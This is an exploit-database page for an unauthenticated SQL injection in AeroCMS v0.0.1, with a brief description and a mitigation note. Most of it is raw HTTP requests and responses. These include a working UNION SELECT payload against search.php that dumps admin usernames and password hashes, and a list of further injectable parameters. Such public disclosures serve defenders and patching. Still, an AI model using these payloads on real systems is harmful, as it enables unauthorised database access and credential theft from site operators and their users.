header-logo
Suggest Exploit
vendor:
AeroCMS
by:
Hubert Wojciechowski
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AeroCMS
Affected Version From: 0.0.1
Affected Version To: 0.0.1
Patch Exists: NO
Related CWE:
CPE: a:megatkc:aerocms:0.0.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2022

Aero CMS v0.0.1 – SQL Injection (no auth)

Aero CMS v0.0.1 is vulnerable to SQL Injection without authentication. An attacker can send a specially crafted HTTP POST request to the search.php page with malicious SQL code in the search parameter. This will cause the server to return an error message containing the SQL code, which can be used to extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

## Example SQL Injection

-----------------------------------------------------------------------------------------------------------------------
Param: search
-----------------------------------------------------------------------------------------------------------------------
Req sql ini detect
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692'&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:06 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3466
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1

-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692''&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:10 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94216
[...]

-----------------------------------------------------------------------------------------------------------------------
Req exploiting sql ini get data admin
-----------------------------------------------------------------------------------------------------------------------

POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 113

search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 05:40:05 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101144
[...]

                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
[...]

-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [filename]
/AeroCMS-master/admin/profile.php [filename]
/AeroCMS-master/author_posts.php [author]
/AeroCMS-master/category.php [category]
/AeroCMS-master/post.php [p_id]
/AeroCMS-master/search.php [search]
/AeroCMS-master/admin/categories.php [cat_title]
/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
/AeroCMS-master/admin/posts.php [post_content]
/AeroCMS-master/admin/posts.php [p_id]
/AeroCMS-master/admin/posts.php [post_category_id]
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [reset]

Navigation

Suggest Exploit

Services By CQR